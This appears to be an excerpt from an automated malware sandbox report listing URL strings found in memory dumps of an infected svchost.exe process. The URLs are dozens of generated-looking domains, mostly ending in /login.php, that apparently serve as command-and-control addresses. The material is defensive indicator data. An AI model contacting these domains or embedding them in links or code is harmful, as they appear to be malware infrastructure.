    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymyn.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynud.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084205455.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynyr.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysid.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysij.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysij.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvon.com/login.php
    Source: svchost.exe, 00000002.00000003.1876564689.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885927315.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573220991.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywor.com/login.php
    Source: svchost.exe, 00000002.00000003.2063012726.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywyj.com/login.php
    Source: svchost.exe, 00000002.00000003.1547180269.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxun.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533526406.000000000295D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755017.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722234012.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
    Source: svchost.exe, 00000002.00000003.1590675413.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591229349.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017552428.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595288365.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594416015.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjux.com/login.php
    Source: svchost.exe, 00000002.00000003.1579481931.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577836262.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591194658.0000000006008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/login.php
    Source: svchost.exe, 00000002.00000002.2675178406.000000000B454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663213294.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085531823.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymij.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytej.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546775468.00000000029AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvod.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvor.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywex.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583844692.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfoj.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643117669.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjix.com/login.php
    Source: svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550752582.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548763256.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562152424.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
    Source: svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylen.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymud.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417918373.000000000612C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysan.com/
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysan.com/login.php
    Source: svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysan.com/login.phpcom/login.php
    Source: svchost.exe, 00000002.00000003.2094100797.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654719612.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077611369.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095132810.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650594979.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysox.com/login.php
    Source: svchost.exe, 00000002.00000003.1634278888.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1997163997.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606063186.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610951340.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607634712.000000000294D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616632601.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608032258.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630888334.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631259260.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630898468.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1622227602.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2008438973.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602654258.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609459423.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytar.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyved.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674430217.0000000006115000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.00000000060BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxid.com/login.php
